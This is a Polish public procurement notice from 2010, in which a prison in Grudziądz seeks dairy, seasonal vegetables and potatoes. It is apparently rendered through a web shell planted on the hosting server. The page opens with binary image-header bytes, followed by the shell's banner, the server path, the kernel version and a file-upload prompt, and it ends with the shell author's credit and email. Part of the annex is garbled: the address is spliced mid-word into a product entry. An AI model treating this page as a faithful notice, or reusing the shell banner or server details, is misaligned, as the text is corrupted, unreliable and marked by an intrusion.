JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100607/157846-N-2010.html

<p class="kh_header"><b>Grudziądz: Dostawy artykułów spożywczych -  Nabiał, Warzywa sezonowe, Ziemniaki jadalne Nr sprawy DKw-220-06-2010</b><br>
<b>Numer ogłoszenia: 157846 - 2010; data zamieszczenia: 07.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny nr 2 , ul. Sikorskiego 13/17, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 6421460 w. 280, faks 056 6421398.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych -  Nabiał, Warzywa sezonowe, Ziemniaki jadalne Nr sprawy DKw-220-06-2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1: NABIAŁ
(1)Jogurt naturalny bez cukru (CPV 15551310-1) w ilości około  620 kg; 
świeży, w pierwszym gatunku, pakowany w odpowiedni kubek o gramaturze od 0.100 kg do 0.150 kg z terminem przydatności do spożycia nie krótszym niż 14 dni od daty dostawy.
(2)Produkt seropodobny (CPV 15540000-5) w ilości około 120 kg;
w osłonce z tworzywa sztucznego  lub parafiny, waga jednostkowa od 0.500 kg do 5 kg,
z terminem przydatności do spożycia nie krótszym niż 30 dni od daty dostawy. 
(3)Ser topiony - różne smaki ( (CPV 15542200-1) w ilości około 1350 kg; 
wielosmakowy, porcjowany świeży, w pierwszym gatunku, sztuka w kształcie prostokąta
o wadze do 0.100 kg, z terminem przydatności do spożycia nie krótszym niż 30 dni od daty dostawy. 
(4)Ser twardy (CPV 15544000-3) w ilości około 630 kg; 
podpuszczkowy dojrzewający, wyprodukowany z mleka pasteryzowanego, w pierwszym gatunku, w osłonce z tworzywa sztucznego  lub parafiny, waga jednostkowa od 0.500 kg do
5 kg, z terminem przydatności do spożycia nie krótszym niż 30 dni od daty dostawy.
(5)Serek homogenizowany naturalny bez cukru (CPV 15540000-5) w ilości około 150 kg;
Serek homogenizowany naturalny pakowany w opakowania o pojemności od 0.100 do
0.150 kg. Termin przydatności do spożycia nie krótszy niż 14 dni od daty dostawy. 
(6)Serek homogenizowany smakowy (CPV 15540000-5) w ilości około 700 kg;
Serek homogenizowany o różnych smakach (np. wanilinowy, truskawkowy, itp.) pakowany
w opakowania o pojemności od 0.100 do 0.150 kg. Termin przydatności do spożycia nie krótszy niż 14 dni od daty dostawy.
(7)Śmietana spożywcza 18% (CPV 15512000-0) w ilości około 2 050 kg; 
homogenizowana, w pierwszym gatunku, o zawartości tłuszczu do 18% w opakowania
o pojemności od 0.20 kg do 1 kg, z terminem przydatności do spożycia nie krótszym niż 14 dni od daty dostawy. 
(8)Twaróg (CPV 15542100-0) w ilości około 2000 kg; 
półtłusty, świeży, w pierwszym gatunku, pakowany w folię, format -kostka, o gramaturze od 0.20 kg do 0,25 kg, z terminem przydatności do spożycia nie krótszym niż 14 dni od daty dostawy.
(9)Serek twarogowo - śmietankowy typu -Grani- w ilości około 90 kg;
 w pierwszym gatunku, o zawartości tłuszczu od 3% do 10%,  pakowany w opakowania
o pojemności od 0.100 do 0.150 kg., z terminem przydatności do spożycia nie krótszym niż 8 dni od daty dostawy.
Okres realizacji zamówienia od 01.07.2010 r. do 30.06.2011 r.
Część 2: WARZYWA SEZONOWE
Lp.Nazwa produktu;Wspólny słownik zamówień (CPV);Norma;Szacunkowe Zapotrzebowanie w kg 
1
Brokuły świeże
03221430-9
PN-R-75369
120
2
Buraki ćwikłowe świeże
03221111-7
PN-R-75360
1750
3
Cebula
03221113-1
PN-85/R75359
2700
4
Cebula czerwona
03221113-1
PN-85/R75359
60
5
Fasola szparagowa świeża
03221212-5
PN/75-A-77001 
400
6
Jabłka
03222320-2
PN-A-77608
1500
7
Kalafior świeży
03221420-6
PN-72/R-75361 
200
8
Kapusta biała świeży
03221410-3
PN-85/R75359
2000
9
Kapusta czerwona świeża
03221410-3
PN-85/R75359
500
10
Koperek zielony
03221000-6
PN-R-75381
30
11
Marchew świeża
03221112-4
 PN-85/R75359
3500
12
Natka pietruszki
03221000-6
PN-R-75381
30
13
Ogórek świeży
03221270-9
PN-85/R-75359
1000
14
Pieczarki
03221260-6
PN-75/R-75078
150
15
Pietruszka korzeniowa
03221110-0
PN-85/R75359
650
16
Pomidory świeże
03221240-0
PN-91/R-75368
850
17
Por świeży
03221000-6
PN-R-75521
400
18
Seler korzeniowy
03221120-3
PN-85/R75359
1350

Okres realizacji zamówienia od 01.07.2010 r. do 15.10.2010 r.
Część 3: ZIEMNIAKI JADALNE
Lp.;Nazwa produktu;Wspólny słownik zamówień (CPV);Norma;Szacunkowe Zapotrzebowanie w kg 
1.
Ziemniaki jadalne o średnicy poprzecznej  min. 4 cm. i podłużnej min. 5 cm.
03212100-1
PN-85/R75359
24000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 03.22.00.00-9, 03.21.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie - załącznik nr 2 do siwz;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie - załącznik nr 2 do siwz;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana niniejszej umowy jest dopuszczalna na warunkach określonych w art 144 ustawy Pzp. Zmiany w niniejszej umowie mogą zostać wprowadzone w zakresie:
nazwy, adresu oraz osób reprezentujących strony,
zmiany cen artykułów spożywczych wymienionych w umowie o kwotę nie większą niż wynikająca ze wskaźnika cen towarów i usług konsumpcyjnych podanego przez GUS w Monitorze Polskim w okresie trwania umowy,
zmiany cen artykułów spożywczych wymienionych w umowie ze względu na zmianę urzędowej stawki VAT na artykuły, których dotyczy umowa,
każdej zmiany która jest korzystna dla zamawiającego lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr 2
ul. Sikorskiego 13/17
86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2010 godzina 12:00, miejsce: Zakład Karny Nr 2
ul. Sikorskiego 13/17
86-300 Grudziądz
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (1)Jogurt naturalny bez cukru (CPV 15551310-1) w ilości około  620 kg; 
świeży, w pierwszym gatunku, pakowany w odpowiedni kubek o gramaturze od 0.100 kg do 0.150 kg z terminem przydatności do spożycia nie krótszym niż 14 dni od daty dostawy.
(2)Produkt seropodobny (CPV 15540000-5) w ilości około 120 kg;
w osłonce z tworzywa sztucznego  lub parafiny, waga jednostkowa od 0.500 kg do 5 kg,
z terminem przydatności do spożycia nie krótszym niż 30 dni od daty dostawy. 
(3)Ser topiony - różne smaki ( (CPV 15542200-1) w ilości około 1350 kg; 
wielosmakowy, porcjowany świeży, w pierwszym gatunku, sztuka w kształcie prostokąta
o wadze do 0.100 kg, z terminem przydatności do spożycia nie krótszym niż 30 dni od daty dostawy. 
(4)Ser twardy (CPV 15544000-3) w ilości około 630 kg; 
podpuszczkowy dojrzewający, wyprodukowany z mleka pasteryzowanego, w pierwszym gatunku, w osłonce z tworzywa sztucznego  lub parafiny, waga jednostkowa od 0.500 kg do
5 kg, z terminem przydatności do spożycia nie krótszym niż 30 dni od daty dostawy.
(5)Serek homogenizowany naturalny bez cukru (CPV 15540000-5) w ilości około 150 kg;
Serek homogenizowany naturalny pakowany w opakowania o pojemności od 0.100 do
0.150 kg. Termin przydatnośZakład Karny Nr 2
ul. Sikorskiego 13/17
(6)86-300 Grudziądzci do spożycia nie krótszy niż 14 dni od daty dostawy. 
(7)Serek homogenizowany smakowy (CPV 15540000-5) w ilości około 700 kg;
Serek homogenizowany o różnych smakach (np. wanilinowy, truskawkowy, itp.) pakowany
w opakowania o pojemności od 0.100 do 0.150 kg. Termin przydatności do spożycia nie krótszy niż 14 dni od daty dostawy.
(8)Śmietana spożywcza 18% (CPV 15512000-0) w ilości około 2 050 kg; 
homogenizowana, w pierwszym gatunku, o zawartości tłuszczu do 18% w opakowania
o pojemności od 0.20 kg do 1 kg, z terminem przydatności do spożycia nie krótszym niż 14 dni od daty dostawy. 
(9)Twaróg (CPV 15542100-0) w ilości około 2000 kg; 
półtłusty, świeży, w pierwszym gatunku, pakowany w folię, format(kostka), o gramaturze od 0.20 kg do 0,25 kg, z terminem przydatności do spożycia nie krótszym niż 14 dni od daty dostawy.
(10)Serek twarogowo - śmietankowy typu (Grani) w ilości około 90 kg;
 w pierwszym gatunku, o zawartości tłuszczu od 3% do 10%,  pakowany w opakowania
o pojemności od 0.100 do 0.150 kg., z terminem przydatności do spożycia nie krótszym niż 8 dni od daty dostawy.
Okres realizacji zamówienia od 01.07.2010 r. do 30.06.2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa sezonowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa produktu
Wspólny słownik zamówień (CPV)
Norma
Szacunkowe Zapotrzebowanie w kg 
1
Brokuły świeże
03221430-9
PN-R-75369
120
2
Buraki ćwikłowe świeże
03221111-7
PN-R-75360
1750
3
Cebula
03221113-1
PN-85/R75359
2700
4
Cebula czerwona
03221113-1
PN-85/R75359
60
5
Fasola szparagowa świeża
03221212-5
PN/75-A-77001 
400
6
Jabłka
03222320-2
PN-A-77608
1500
7
Kalafior świeży
03221420-6
PN-72/R-75361 
200
8
Kapusta biała świeży
03221410-3
PN-85/R75359
2000
9
Kapusta czerwona świeża
03221410-3
PN-85/R75359
500
10
Koperek zielony
03221000-6
PN-R-75381
30
11
Marchew świeża
03221112-4
 PN-85/R75359
3500
12
Natka pietruszki
03221000-6
PN-R-75381
30
13
Ogórek świeży
03221270-9
PN-85/R-75359
1000
14
Pieczarki
03221260-6
PN-75/R-75078
150
15
Pietruszka korzeniowa
03221110-0
PN-85/R75359
650
16
Pomidory świeże
03221240-0
PN-91/R-75368
850
17
Por świeży
03221000-6
PN-R-75521
400
18
Seler korzeniowy
03221120-3
PN-85/R75359
1350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ziemniaki jadalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa produktu
Wspólny słownik zamówień (CPV)
Norma
Szacunkowe Zapotrzebowanie w kg 
1.
Ziemniaki jadalne o średnicy poprzecznej  min. 4 cm. i podłużnej min. 5 cm.
03212100-1
PN-85/R75359
24000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com